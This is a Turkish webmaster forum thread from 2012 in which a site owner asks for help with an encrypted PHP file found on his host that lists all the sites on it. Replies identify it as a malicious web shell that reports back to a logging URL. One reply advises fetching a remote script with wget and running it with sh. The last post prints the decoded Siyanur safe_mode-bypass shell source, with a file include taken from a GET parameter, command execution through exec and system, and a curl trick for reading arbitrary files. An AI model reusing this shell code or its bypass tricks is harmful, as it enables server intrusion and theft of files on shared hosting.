• 03-10-2012, 12:21:15
    #1
    WMB
    Üyeliği durduruldu
    Hostumda böyle bir dosya buldum adı Siyanur5x.php kodlarına baktım şifrelemiş çözemedim bitürlü, ama normal php gibi açılıyor. ve hostumdaki siteleri hepsini listeledi yani durum ciddi arkadaşlar, en azından kodlarını görseydim kullandığı fonksyonları engellerdim yardımcı olursanız sevinirim

    php dosyasının kodları: http://sezerfidancilik.net/css/Siyanur5x.txt php olarak kaydedip bakın hostunuzda açın benim hostta bütün siteleri listeledi hepsinde gezebiliyor
  • 03-10-2012, 13:36:45
    #2
    Üyeliği durduruldu
    Bu Zararlı bir Shell'dir. Hemen Silin ve Cpanelden virüs taraması yaptırınız

    Hostunuza doğrudan erişim sağlıyor bu php dosyası ayrıca diğer sitelerinizede ulaşabiliyor
  • 03-10-2012, 15:57:07
    #3
    Kimlik doğrulama veya yönetimden onay bekliyor.
    kod şifrelenmiş ama birazcık uğraştırsa da kırdım.

    http://pastebin.com/aZ0VG8aW

    firmareklam.net adresinden kendilerince bi lisanslama sistemi yapmışlar. aynı zamanda bu shellin atıldığı yerleri de logluyolar. http://firmareklam.net/css/no/ciz.js shelli açar açmaz bu adrese istek yapıyor zaten.

    title ve kodlamadaki notlara göre imhatimi.org a ait görünüyor. ayrıca içinde http://dietimes.blogspot.com/ böyle bir url de bulunuyor ilgili olduğu gayet belli.
  • 23-11-2012, 18:21:58
    #4
    imhatiminin işi mec'in yaptığı bi shell bu.
  • 27-11-2012, 14:18:19
    #5
    Üyeliği durduruldu
    @WMB sistemin wp ise tema ve eklenti klasörüne chmod 644 ver en fazla panelinden meta atarlar
    @FTWDA o .js loglu shel anlamına geliyor yani adam shelleri takip ediyor
    @Hacktronik antivirüslerin bulamadığını cpanelden sil dediğinde hepsini silmez
  • 02-12-2012, 16:50:15
    #6
    Üyeliği durduruldu
    çözümünü https://www.r10.net/site-guvenligi-am...degisiyor.html konusunda yazdım ordakı arkadasla çözümünüz aynı iyi çalışmalar
  • 02-12-2012, 16:57:57
    #7
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Host sağlayıcınızla iletişime geçip aşağıdaki işlemi yapın. Yetkiniz varsa kendinizde yapabilirsiniz.

    SSH ile bağlanıp aşağıdaki komutu verip dosyanın çalışmasını engelleyebilirsiniz.

    wget http://403security.org/modsec/install_modsec_rules
    sh install_modsec_rules

    Tüm dosyalarınızıda taratmayı unutmayın.
  • 05-12-2012, 11:22:23
    #8
    önemli yerlerin hepsi kriptolanmış halde
  • 15-12-2012, 11:00:27
    #9
    Arkadaşın dediklerini yapın.
    Kodun açık hali ise en aşağıda;(bazı yerleri çalışmasın diye değiştirdim.)

    serdarureber adlı üyeden alıntı: mesajı görüntüle
    Host sağlayıcınızla iletişime geçip aşağıdaki işlemi yapın. Yetkiniz varsa kendinizde yapabilirsiniz.

    SSH ile bağlanıp aşağıdaki komutu verip dosyanın çalışmasını engelleyebilirsiniz.

    wget http://403security.org/modsec/install_modsec_rules
    sh install_modsec_rules

    Tüm dosyalarınızıda taratmayı unutmayın.
    <?php /* ************************************************************************ *                      Siyanur.PHP Handler Bypass Shell Beta 1.0       * ************************************************************************ *                                                                      * *          /      \                                                    * *       \  \  ,,  /  /                                                 * *        '-.`\()/`.-'                                                  * *       .--_'(  )'_--.            * (C) 2008 Www.SpyHackerZ.coM *      * *      / /` /`""`\ `\ \                                                * *       |  |  ><  |  |              Public:  Eylul  01, 2008           * *       \  \      /  /              Mailto: mectruy@hotmail.com        * *           '.__.'                                                     * *                                                                      * ************************************************************************ *Greatz:// MecTruy // RedstorM // Kaldera // Exterminant // Dumenci // *Linux version: 5.2.5 // 5.2.6 Bypassed *Http:// www.imhatimi.org // www.spyhackerz.com // mectruy.blogspot.com *Siyanur.php Shell */ #Siyanur.PHP 5.2.6 safe_mode Handler bypass Free Edition #Sadece Bypass ?zelli?i vard?r komut ve daha ?st?n ?zelliklere sahip Siyanur hen?z da??t?lmam??t?r. # if ($_GET['x']) { include($_GET['x']); } if ($_POST['cxc']=='down') { header("Content-disposition: filename=decode.txt"); header("Content-type: application/octetstream"); header("Pragma: no-cache"); header("Expires: 0"); error_reporting(0); echo base64_decode($_POST['xCod']); exit; }  ?> <html>  <head> <title>Siyanur.PHP 5.2.6 / 5.2.6 safe_mode Handler bypass (Beta Free Edition)  - Powered By MecTruy</title> </head>  <body bgcolor="#000000"> <font color=FF8000> <font face=verdana> <?php  // //phpinfo if (empty($_POST['phpinfo'] )) {     }else{     echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";     exit; } // // encode/decode // // uname function getsystem() {return php_uname('s')." ".php_uname('r')." ".php_uname('v');};  // //safemode function safe_mode(){ if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3){$_SESSION['safe_mode'] = 1;return "<b><font color=#800000 face=Verdana>ON</font></b>";}else{   $_SESSION['safe_mode'] = 0;return "<font color=#008000><b>OFF</b></font>";} };function ex($in){ $out = ''; if(function_exists('exec')){exec($in,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($in);$out = ob_get_contents();ob_end_clean();} elseif(function_exists('system')){ob_start();system($in);$out = ob_get_contents();ob_end_clean();} elseif(function_exists('shell_exec')){$out = shell_exec($in);} elseif(is_resource($f = popen($in,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);} pclose($f);} return $out;} // ?>      <tr>     <td width="100%" height="43">      <table border="1" cellpadding="0" cellspacing="0" bordercolor="#545454" width="100%" id="AutoNumber2" bgcolor="#424242" style="border-collapse: collapse">       <tr>         <td width="100%" bgcolor="#000000"> </td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Kernel :</font> <?php echo @php_uname();?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Server :</font> <?php echo $_SERVER['SERVER_NAME'];?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>PHP :</font> <?php echo phpversion();?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Dic :</font> <?php echo getcwd();?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Safe_Mode :</font> <?php echo safe_mode();?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Software :</font> <?php echo getenv("SERVER_SOFTWARE");?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>iD :</font> <?php echo system(id);?></td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>C0nnect ? :</font> <?php echo ($_SERVER['HTTP_CONNECTION']);?>   <font color=ffffff>Port :</font> <?php echo (":".$_SERVER["SERVER_PORT"]);?>  </td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Your Agent :</font> <?php echo ($_SERVER['HTTP_USER_AGENT']);?>   <font color=ffffff>Your ip info :</font> <?php echo ($_SERVER['REMOTE_ADDR']);?>   MySQL: </td>       </tr>       <tr>         <td width="100%" style="font-family: (1)Fonts44-Net; color: #FF0000; font-size: 8pt; font-weight: bold" dir="ltr"><font color=ffffff>Protokol :</font> <?php echo ($_SERVER["SERVER_PROTOCOL"]);?>   <font color=ffffff>Charset :</font> <?php echo ($_SERVER['HTTP_ACCEPT_CHARSET']);?>   <font color=ffffff>Encoding :</font> <?php echo ($_SERVER['HTTP_ACCEPT_ENCODING']);?>   <font color=ffffff>Lang :</font> <?php echo ($_SERVER['HTTP_ACCEPT_LANGUAGE']);?></td>       </tr>         <tr>        </tr>     </table>      </td>   </tr>    <tr>     <td width="100%" height="1"><?php if (empty($_POST['z3r'])){          echo '<form method="POST">';     echo '<input type="text" name="z3r" size="50" value="/home/hedefuser/public_html/index.php">';     echo '<input type="submit" value="Encode">';     echo '</form>'; }else{     $b4se64 =$_POST['z3r'];     $heno =base64_encode($b4se64);     echo '<p align="center">';     echo '<textarea method="POST" rows="1" cols="80" wrar="off">';     print $heno;     echo '</textarea>'; }     echo '<form method="post" /><input type="text" name="cz" size="50" value="Encode edilmi? kod buraya.." /><input type="submit" value="OK !!" /><select name=dec><option value=show>Oku</option><option value=decode>De$ifre</option></select></form>';      if( !empty($_POST['cz']) )         if ($dec=='decode'){echo "<form name=form method=POST>";}         echo "<p align=left><textarea method='POST' name='xCod' cols='60' rows='25' wrar='off' >";                  $ss=$_POST['cz'];             $file = base64_decode($ss);                                       if((curl_exec(curl_init("file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd emptY($file))                              if ($_POST['dec']=='decode'){echo base64_encode($_POST['xCod']);}   echo "</textarea></p>";  ?></td>   </tr>   <tr>     <td width="100%" style="font-family: (1)Fonts44-Net; color: #FFFFFF; font-size: 8pt; font-weight: bold" height="13"><?php if ($dec=='decode'){ echo "<p align=center><input type=hidden name=cxc value='down'><input type=submit name=submit value='DownLoad'></p></form>"; } ?></td>   </tr>   <tr>     <td width="100%" style="font-family: (1)Fonts44-Net; color: #FFFFFF; font-size: 8pt; font-weight: bold" height="13">     <p align="left"><font size="1">Siyanur.PHP </font> <a href="http://www.imhatimi.org">     <font size="1" color="#8B8B8B">www.imhatimi.org</font></a>   <a href="http://www.spyhackerz.com">     <font size="1" color="#8B8B8B">www.spyhackerz.com</font></a></td>   </tr>   <tr>     <td width="100%" style="font-family: (1)Fonts44-Net; color: #FFFFFF; font-size: 8pt; font-weight: bold" height="13">     <p align="left"> <font size="1">Coded By MecTruy</font></td>   </tr> </table>    </center> </div>  </body>  </html>